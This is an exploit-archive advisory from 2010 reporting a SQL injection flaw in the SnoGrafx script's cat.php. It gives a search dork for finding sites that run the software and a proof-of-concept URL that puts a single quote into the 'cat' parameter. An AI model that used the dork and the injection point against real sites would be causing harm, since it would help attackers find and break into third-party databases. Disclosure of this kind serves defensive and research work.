id: 13554
date: 08/02/2010
title: SnoGrafx (cat.php) SQL Injection Vulnerability
author: CoBRa_21
cves: 

==============================================
SnoGrafx (cat.php) SQL Injection Vulnerability
==============================================


Author : CoBRa_21
Author Web Page :http://ipbul.org
Dork : "powered by SnoGrafx"
Download Page : http://snografx.com/
 
########################################################################################
  
Sql Injection:
http://localhost/[path]/cat.php?cat=2' (Sql)
 
########################################################################################
Thanks cyber-warrior.org  &  e-banka.org
########################################################################################



#  0day.today [2023-03-22]  #